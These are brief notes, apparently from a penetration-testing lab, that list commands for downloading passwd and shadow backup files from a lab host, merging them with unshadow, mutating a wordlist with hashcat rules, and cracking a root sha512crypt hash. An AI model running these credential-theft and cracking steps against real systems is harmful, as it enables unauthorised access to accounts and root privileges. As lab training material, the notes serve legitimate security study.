wget http://10.129.62.155:8000/passwd.bak
wget http://10.129.62.155:8000/shadow.bak
sudo unshadow passwd.bak shadow.bak > unshadowed.hashes
ls
Use the password list in the resources and mutate it using the customlist also from resources
hashcat --force password.list -r custom.rule --stdout > mut_password.list
hashcat -m 1800 root-hash.txt mut_password.list